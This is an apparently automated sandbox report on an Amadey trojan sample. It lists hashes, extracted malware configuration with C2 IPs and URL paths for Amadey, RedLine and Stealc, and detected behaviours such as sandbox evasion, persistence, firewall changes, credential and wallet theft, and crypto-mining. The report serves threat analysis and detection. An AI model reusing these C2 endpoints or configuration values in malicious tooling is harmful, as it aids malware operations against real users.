amadey | 2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c

Resubmissions

01/07/2024, 10:57 UTC

240701-m2gvna1bmr 10

27/06/2024, 14:07 UTC

240627-re4s5axbqm 10

26/06/2024, 21:27 UTC

240626-1awrdsvdkd 10

Analysis

max time kernel
274s
max time network
275s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27/06/2024, 14:07 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Size

1.9MB
MD5

f7b7a8eb191d45b9cf730d6fe78d36e1
SHA1

0b7a7220d686c904b0ea89b6e036fb21acf0f85b
SHA256

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c
SHA512

b282e77a5855c5b302139740dfc870eec9a358669b84a8a35ccbef6abc40c4182fb34cf24d17bd5012173e71b8d7c7ddecc834248a470e7e9cffc3cdd19a4b36
SSDEEP

49152:0YUvB6P4Zu2Zrq9Lp8lt+YPawAYsOWgu30w:KwPpN0tviwAY+g0n

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

LiveTraffic

4.184.236.127:1110

Extracted

Family

redline

Botnet

123

185.215.113.67:40960

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Extracted

Family

stealc

Botnet

jopa

http://65.21.175.0

Attributes

url_path
/108e010e8f91c38c.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detects Monster Stealer. 3 IoCs

resource	yara_rule
behavioral2/files/0x000700000002349e-458.dat	family_monster
behavioral2/memory/724-641-0x00007FF60F540000-0x00007FF61077E000-memory.dmp	family_monster
behavioral2/memory/724-653-0x00007FF60F540000-0x00007FF61077E000-memory.dmp	family_monster

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Monster
Monster is a Golang stealer that was discovered in 2024.
stealer monster
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral2/memory/2524-38-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral2/files/0x0007000000023456-200.dat	family_redline
behavioral2/files/0x000800000002344d-218.dat	family_redline
behavioral2/memory/4840-235-0x0000000000F60000-0x0000000000FB0000-memory.dmp	family_redline
behavioral2/memory/756-234-0x0000000000CB0000-0x0000000000D00000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/2504-628-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-629-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-634-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-635-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-633-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-632-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-631-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-657-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2504-658-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
48	4928	powershell.exe
53	4928	powershell.exe
71	1700	powershell.exe
76	1700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
320	powershell.exe
3776	powershell.exe
1084	powershell.exe
4920	powershell.exe
4928	powershell.exe
1700	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
384	netsh.exe
4732	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	NewLatest.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	Hkbsse.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	ldr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	axplong.exe

Executes dropped EXE 25 IoCs

pid	Process
4996	axplong.exe
3896	gold.exe
3776	NewLatest.exe
2188	Hkbsse.exe
4904	Installer.exe
2760	FirstZ.exe
4976	ldr.exe
4004	Hkbsse.exe
5020	alex5555555.exe
4840	123.exe
756	svhosts.exe
4188	Explorers.exe
3580	streamer.exe
5112	TpWWMUpe0LEV.exe
3904	Hkbsse.exe
2684	axplong.exe
1572	build.exe
724	stub.exe
5064	reakuqnanrkn.exe
2488	Hkbsse.exe
4496	axplong.exe
3904	Hkbsse.exe
2996	axplong.exe
1360	axplong.exe
3872	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Wine	axplong.exe

Loads dropped DLL 34 IoCs

pid	Process
5112	TpWWMUpe0LEV.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe
724	stub.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2504-628-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-629-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-627-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-634-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-635-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-633-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-632-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-631-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-625-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-623-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-626-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-657-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2504-658-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
64	bitbucket.org
115	raw.githubusercontent.com
116	raw.githubusercontent.com
125	pastebin.com
126	pastebin.com
63	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
109	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3476	powercfg.exe
540	powercfg.exe
3252	powercfg.exe
4300	powercfg.exe
3300	powercfg.exe
2028	powercfg.exe
5080	powercfg.exe
4876	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1976	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4996	axplong.exe
2684	axplong.exe
4496	axplong.exe
2996	axplong.exe
1360	axplong.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3896 set thread context of 2524	3896	gold.exe	93
PID 5020 set thread context of 2488	5020	alex5555555.exe	113
PID 5112 set thread context of 3448	5112	TpWWMUpe0LEV.exe	133
PID 5064 set thread context of 1188	5064	reakuqnanrkn.exe	228
PID 5064 set thread context of 2504	5064	reakuqnanrkn.exe	232
PID 3580 set thread context of 4480	3580	streamer.exe	237

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\Tasks\Hkbsse.job	ldr.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4344	sc.exe
2540	sc.exe
4468	sc.exe
4760	sc.exe
2216	sc.exe
684	sc.exe
3200	sc.exe
2696	sc.exe
4000	sc.exe
4808	sc.exe
2468	sc.exe
1184	sc.exe
1296	sc.exe
320	sc.exe
3968	sc.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x00070000000234c6-486.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4344	3896	WerFault.exe	92
2336	5020	WerFault.exe	111
2784	3448	WerFault.exe	133

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aspnet_regiis.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_regiis.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
5072	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
2580	tasklist.exe
2740	tasklist.exe
4760	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4876	ipconfig.exe
440	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
384	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4148	taskkill.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639710237343087"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
876	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1136	schtasks.exe
3712	schtasks.exe
3860	schtasks.exe
5072	schtasks.exe
4884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4996	axplong.exe
4996	axplong.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
3776	powershell.exe
3776	powershell.exe
3776	powershell.exe
1700	powershell.exe
1700	powershell.exe
1700	powershell.exe
4188	Explorers.exe
4188	Explorers.exe
756	svhosts.exe
756	svhosts.exe
756	svhosts.exe
756	svhosts.exe
4840	123.exe
4840	123.exe
4840	123.exe
4840	123.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
2684	axplong.exe
2684	axplong.exe
2760	FirstZ.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
2760	FirstZ.exe
2760	FirstZ.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
5064	reakuqnanrkn.exe
4920	powershell.exe
4920	powershell.exe
4920	powershell.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	4188	Explorers.exe
Token: SeBackupPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeDebugPrivilege	756	svhosts.exe
Token: SeDebugPrivilege	4840	123.exe
Token: SeDebugPrivilege	2488	RegAsm.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeIncreaseQuotaPrivilege	4060	WMIC.exe
Token: SeSecurityPrivilege	4060	WMIC.exe
Token: SeTakeOwnershipPrivilege	4060	WMIC.exe
Token: SeLoadDriverPrivilege	4060	WMIC.exe
Token: SeSystemProfilePrivilege	4060	WMIC.exe
Token: SeSystemtimePrivilege	4060	WMIC.exe
Token: SeProfSingleProcessPrivilege	4060	WMIC.exe
Token: SeIncBasePriorityPrivilege	4060	WMIC.exe
Token: SeCreatePagefilePrivilege	4060	WMIC.exe
Token: SeBackupPrivilege	4060	WMIC.exe
Token: SeRestorePrivilege	4060	WMIC.exe
Token: SeShutdownPrivilege	4060	WMIC.exe
Token: SeDebugPrivilege	4060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4060	WMIC.exe
Token: SeRemoteShutdownPrivilege	4060	WMIC.exe
Token: SeUndockPrivilege	4060	WMIC.exe
Token: SeManageVolumePrivilege	4060	WMIC.exe
Token: 33	4060	WMIC.exe
Token: 34	4060	WMIC.exe
Token: 35	4060	WMIC.exe
Token: 36	4060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4060	WMIC.exe
Token: SeSecurityPrivilege	4060	WMIC.exe
Token: SeTakeOwnershipPrivilege	4060	WMIC.exe
Token: SeLoadDriverPrivilege	4060	WMIC.exe
Token: SeSystemProfilePrivilege	4060	WMIC.exe
Token: SeSystemtimePrivilege	4060	WMIC.exe
Token: SeProfSingleProcessPrivilege	4060	WMIC.exe
Token: SeIncBasePriorityPrivilege	4060	WMIC.exe
Token: SeCreatePagefilePrivilege	4060	WMIC.exe
Token: SeBackupPrivilege	4060	WMIC.exe
Token: SeRestorePrivilege	4060	WMIC.exe
Token: SeShutdownPrivilege	4060	WMIC.exe
Token: SeDebugPrivilege	4060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4060	WMIC.exe
Token: SeRemoteShutdownPrivilege	4060	WMIC.exe
Token: SeUndockPrivilege	4060	WMIC.exe
Token: SeManageVolumePrivilege	4060	WMIC.exe
Token: 33	4060	WMIC.exe
Token: 34	4060	WMIC.exe
Token: 35	4060	WMIC.exe
Token: 36	4060	WMIC.exe
